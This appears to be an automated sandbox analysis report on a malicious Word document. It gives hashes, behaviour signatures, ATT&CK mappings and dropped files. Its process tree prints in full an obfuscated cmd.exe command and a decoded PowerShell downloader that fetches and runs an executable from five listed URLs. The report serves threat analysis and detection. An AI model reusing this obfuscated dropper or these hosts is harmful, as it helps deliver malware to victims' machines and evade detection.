Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-09-2024 06:51

General

  • Target

    d3c91738ad52ede18e7c98de0d688ee4_JaffaCakes118.doc

  • Size

    79KB

  • MD5

    d3c91738ad52ede18e7c98de0d688ee4

  • SHA1

    b86e74fc6dc8d932006f3c189a743ed020cc0f77

  • SHA256

    6dc235b67ec03448dd547ba027bb18ebb7131429138a85b9aaf9dc74933e1683

  • SHA512

    f5dff51d938b2585f7b270a441ce23645b70906f566da72b7ea2ff1fad8beb97c257e6582657a6d84f5141172bc929388a19b9cf9c7e2af32b20a1a31226b4c1

  • SSDEEP

    1536:vJK+lhLocn1kp59gxBK85fBt+a9pjduedt9+d5paxyN2:vJbla41k/W48jjduedt9+d5paxyQ

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Start PowerShell.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d3c91738ad52ede18e7c98de0d688ee4_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4888
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /V^:^O/C"^se^t M^y=)^Z^W^$YNG^uz^i^E^sJ^SB^p^Oc^4e^x^}@^\at^[/^o^w^Q^L^IP]^jF(^g^l5r^ynq^T^k^0m^-'^2b.U^:^,^1^f^d^ ^{^h;v=^M^+&&^f^or %^2 ^in (15,^2^8,^29,^19^,4^1,^1^1,6^2,^19,^39^,^3^9^,60,^3^,7^,^11^,6^2,^65^,^50^,8,^9^,1,50,63^,3,4^,31,^8^,^6^5^,^50^,^6^2,^25,2^5,^15^,^55,^2^7^,^2^7,^59,^7^,62^,^2^8,1^7,3^8,25^,1^7,^5^3,1^7^,^2^8^,^4^8,27^,3^9,4^4,25^,^15,2^2,62,^2^5,2^5^,15,^55^,27^,27,^52,19^,1^1^,^2^5^,25,4^1^,^2^4^,^64^,19,^39,11,^53^,3^9^,^9^,^64,19,^2^7^,4^0,^1^5^,5^4^,^2^2^,6^2,2^5^,^25,^15^,55,^27,^2^7,^1^1,^24^,^9^,^1^1^,^9^,59^,5^9^,62,53,1^7^,2^8^,4^8^,^2^7,4,2^8^,^2,1^,^59,^18,^2^2,^6^2,^25,^2^5^,15,^55,^27^,2^7,9,4^3,^11,7,4^8,1^9,^2^0^,53,17,2^8,^4^8,^53^,^4^8^,^20^,2^7,8^,4^5^,66^,5^9^,^5^1^,22,^62,^2^5,2^5^,^1^5,^5^5,^2^7,^27^,3^8^,9,^24^,4^3,^38,4^3^,38^,^7^,42^,^1^9^,^4^3^,^41,19^,^2^4,^39^,53^,^1^7,28^,4^8,2^7,^45^,50,^53,1^3,1^5^,3^9^,^9,^25,^3^7,^50^,22,50^,0,^6^3^,^3^,^3^5^,^48^,^64^,65,^37,^26,13^,4^2,1^1,2^5^,1^9,^4^8,^5^3^,^3^2^,^1^6^,^5^3^,33^,24^,2^5,^6^2^,^34^,55,^55,6,1^9^,2^5,^4^5,^1^9^,^4^8,^1^5^,^33^,2^4,25,^6^2^,^37^,0^,^67,5^0,2^3^,^12,^30,9,5^3^,^19^,2^0,^1^9,50,^0^,^6^3^,3,36,46,^30,^6^0,^65^,^5^,^1^9,^29,^4^9,^1^6,^52,3^5^,^1^9,^17^,^2^5,60^,4^9^,^1^7^,^2^8^,^48,60,50^,^4^8^,^1^1,^20^,4^8^,^39,51,5^3,20,48^,^3^9^,6^2,25,25^,^1^5,^50,^6^3^,^3^,^1,^4^6^,4^8,60^,^6^5^,^6^0,^5^,^1^9^,29,4^9,16,^5^2,^35,19^,1^7^,^25,^60^,49^,^1^7^,^28^,^4^8^,6^0,^5^0^,^2^4^,5^9^,^2^8,^5^9,5^2^,5^3^,11^,25,^4^1,^19,^2^4,4^8^,^50,63,^58^,^2^8^,^4^1,19^,^2^4^,^1^7,^6^2^,^37,3,3^5^,^2^8^,44^,60,9,^4^3,60^,^3,^4,31,^8,0,61^,25,^41^,^4^2^,^61,3^,^3^6,^4^6,30^,^5^3^,^2^8,15,^19,4^3^,^3^7,50,^6,^1^0,45^,50^,^5^6,^3^,3^5,28,^4^4^,^5^6,^4^7,0,6^3^,^3,3^6,46,3^0^,53,11^,19,43,59^,^3^7,0,6^3^,^3^,1^,^46,^48^,^53,28^,1^5^,19^,^43,^3^7,0^,6^3,^3,1,46^,^4^8,^5^3,^25^,42,^1^5^,^1^9,^60^,65,^6^0^,^57^,6^3^,^3^,^1^,46^,48^,53,29^,4^1^,^9^,25^,19,37^,^3,^3^6^,4^6^,3^0,^53^,^4^1,19^,1^1,1^5^,^28,4^3,11^,^1^9,14,^2^8,59^,^42,0,63,^3,1,4^6,4^8^,^5^3^,1^1,24^,6^4,19^,25^,^28^,^58,9,^3^9,^1^9^,3^7^,3,35,^4^8^,64,0,^63,^1^3,^25^,2^4^,4^1,25,49^,^33^,4^1,^2^8^,1^7^,1^9^,11^,1^1,60,^3^,^3^5^,^4^8^,6^4^,^6^3^,52,41,1^9,2^4,46^,^2^1,^17,2^4,^2^5^,^1^7,^6^2,^6^1^,2^1,21,60^,^60^,^60^,6^0,60^,60^,6^0^,60,60,^60^,60^,6^0^,6^0,60,^60,6^0^,^60,69)^do ^s^et ^B^1=!^B^1!!M^y:~%^2,1!&&^if %^2=^=^69 c^a^l^l %^B^1:*^B1!^=%"
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:3756
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $ush='ziZ';$YLz='http://duhocgtc.com/lqtp@http://besttravels.live/5pU@http://saisiddh.com/YoWZd4@http://insumex.com.mx/zTMd2@http://giangnguyenreal.com/T'.Split('@');$jmv=([System.IO.Path]::GetTempPath()+'\JQi.exe');$FkQ =New-Object -com 'msxml2.xmlhttp';$Zkm = New-Object -com 'adodb.stream';foreach($joq in $YLz){try{$FkQ.open('GET',$joq,0);$FkQ.send();$Zkm.open();$Zkm.type = 1;$Zkm.write($FkQ.responseBody);$Zkm.savetofile($jmv);Start-Process $jmv;break}catch{}}
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:896

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\JQi.exe
    Filesize

    4KB

    MD5

    e70abfccc2e6cc8bd09dd54ac4504f45

    SHA1

    bfbad891d614b5b2c8e720f4c16720e318df1bea

    SHA256

    3d87aa8faddabf9ad076fab5be5b1c6ba1095532a04523a6098d522a992db01f

    SHA512

    d761524f336a3cc7b3e142453fdb404115a38947b6112e03a056fe47547606d8e249ca89a4457cf52f4c82b18824e0753473f65c39ea4d72ec33e8c19b640c8c

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zhxkqyga.doj.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl
    Filesize

    263KB

    MD5

    ff0e07eff1333cdf9fc2523d323dd654

    SHA1

    77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

    SHA256

    3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

    SHA512

    b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

  • memory/896-61-0x0000025E5F930000-0x0000025E5F952000-memory.dmp
    Filesize

    136KB

  • memory/4888-8-0x00007FFA89E30000-0x00007FFA8A025000-memory.dmp
    Filesize

    2.0MB

  • memory/4888-3-0x00007FFA49EB0000-0x00007FFA49EC0000-memory.dmp
    Filesize

    64KB

  • memory/4888-7-0x00007FFA89E30000-0x00007FFA8A025000-memory.dmp
    Filesize

    2.0MB

  • memory/4888-11-0x00007FFA89E30000-0x00007FFA8A025000-memory.dmp
    Filesize

    2.0MB

  • memory/4888-12-0x00007FFA89E30000-0x00007FFA8A025000-memory.dmp
    Filesize

    2.0MB

  • memory/4888-13-0x00007FFA47D50000-0x00007FFA47D60000-memory.dmp
    Filesize

    64KB

  • memory/4888-10-0x00007FFA89E30000-0x00007FFA8A025000-memory.dmp
    Filesize

    2.0MB

  • memory/4888-9-0x00007FFA89E30000-0x00007FFA8A025000-memory.dmp
    Filesize

    2.0MB

  • memory/4888-16-0x00007FFA89E30000-0x00007FFA8A025000-memory.dmp
    Filesize

    2.0MB

  • memory/4888-18-0x00007FFA47D50000-0x00007FFA47D60000-memory.dmp
    Filesize

    64KB

  • memory/4888-20-0x00007FFA89E30000-0x00007FFA8A025000-memory.dmp
    Filesize

    2.0MB

  • memory/4888-17-0x00007FFA89E30000-0x00007FFA8A025000-memory.dmp
    Filesize

    2.0MB

  • memory/4888-19-0x00007FFA89E30000-0x00007FFA8A025000-memory.dmp
    Filesize

    2.0MB

  • memory/4888-41-0x00007FFA89E30000-0x00007FFA8A025000-memory.dmp
    Filesize

    2.0MB

  • memory/4888-14-0x00007FFA89E30000-0x00007FFA8A025000-memory.dmp
    Filesize

    2.0MB

  • memory/4888-6-0x00007FFA89E30000-0x00007FFA8A025000-memory.dmp
    Filesize

    2.0MB

  • memory/4888-2-0x00007FFA49EB0000-0x00007FFA49EC0000-memory.dmp
    Filesize

    64KB

  • memory/4888-37-0x00007FFA89E30000-0x00007FFA8A025000-memory.dmp
    Filesize

    2.0MB

  • memory/4888-597-0x00007FFA49EB0000-0x00007FFA49EC0000-memory.dmp
    Filesize

    64KB

  • memory/4888-5-0x00007FFA49EB0000-0x00007FFA49EC0000-memory.dmp
    Filesize

    64KB

  • memory/4888-15-0x00007FFA89E30000-0x00007FFA8A025000-memory.dmp
    Filesize

    2.0MB

  • memory/4888-42-0x00007FFA89E30000-0x00007FFA8A025000-memory.dmp
    Filesize

    2.0MB

  • memory/4888-40-0x00007FFA89E30000-0x00007FFA8A025000-memory.dmp
    Filesize

    2.0MB

  • memory/4888-49-0x00007FFA89E30000-0x00007FFA8A025000-memory.dmp
    Filesize

    2.0MB

  • memory/4888-1-0x00007FFA89ECD000-0x00007FFA89ECE000-memory.dmp
    Filesize

    4KB

  • memory/4888-0-0x00007FFA49EB0000-0x00007FFA49EC0000-memory.dmp
    Filesize

    64KB

  • memory/4888-69-0x00007FFA89E30000-0x00007FFA8A025000-memory.dmp
    Filesize

    2.0MB

  • memory/4888-71-0x00007FFA89E30000-0x00007FFA8A025000-memory.dmp
    Filesize

    2.0MB

  • memory/4888-70-0x00007FFA89ECD000-0x00007FFA89ECE000-memory.dmp
    Filesize

    4KB

  • memory/4888-72-0x00007FFA89E30000-0x00007FFA8A025000-memory.dmp
    Filesize

    2.0MB

  • memory/4888-75-0x00007FFA89E30000-0x00007FFA8A025000-memory.dmp
    Filesize

    2.0MB

  • memory/4888-79-0x00007FFA89E30000-0x00007FFA8A025000-memory.dmp
    Filesize

    2.0MB

  • memory/4888-4-0x00007FFA49EB0000-0x00007FFA49EC0000-memory.dmp
    Filesize

    64KB

  • memory/4888-39-0x00007FFA89E30000-0x00007FFA8A025000-memory.dmp
    Filesize

    2.0MB

  • memory/4888-595-0x00007FFA49EB0000-0x00007FFA49EC0000-memory.dmp
    Filesize

    64KB

  • memory/4888-596-0x00007FFA49EB0000-0x00007FFA49EC0000-memory.dmp
    Filesize

    64KB

  • memory/4888-598-0x00007FFA49EB0000-0x00007FFA49EC0000-memory.dmp
    Filesize

    64KB

  • memory/4888-38-0x00007FFA89E30000-0x00007FFA8A025000-memory.dmp
    Filesize

    2.0MB

  • memory/4888-599-0x00007FFA89E30000-0x00007FFA8A025000-memory.dmp
    Filesize

    2.0MB